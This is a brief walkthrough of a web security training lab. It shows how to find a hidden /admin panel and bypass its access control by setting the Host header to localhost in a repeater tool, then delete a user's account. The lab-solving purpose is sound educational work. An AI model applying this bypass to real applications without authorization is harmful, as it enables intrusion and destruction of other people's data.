While conducting any WebApp pentest it is a good practice to get familiarized with the functionality of the application. To start throwing exploits at the target is not just bad practice, but might also lead to a lot of time-wasting and even degradation of performance and this is not what we want to do. The goal is to make the application perform better and be more secure.
The goal of this lab is to access the admin panel and delete Carlos’s account.
Knowing the most common ways the admin page can be found, we can test to see if any of the options work for us.
WordPress based sites usually go with /wp-admin
However, it is not the case for this lab.
Now, let’s try /admin
Now we know that this is where the admin page is and we can exploit it.
If you can’t guess where the admin panel is, GoBuster can be used to find it, but sometimes a simple guess works.
With knowing where the admin panel is, we can now try to get access to it. In our case, “localhost” as a common option is the key. Using repeater we modify our request and send it to the website.
One of the ways to display it is to use the “show response in the browser” functionality. Once we see the admin panel and try to delete carlos account, the website shows that we don’t have privileges for this action.
It happens because our new request host header is not modified to localhost. One way to deal with it is to find the “delete carlos” request in HTTP history, sent it to the repeater, modify the host header to localhost and send it. This way the request is executed with escalated privileges.
We can then again access the admin panel to see that carlos account is gone. The lab is solved.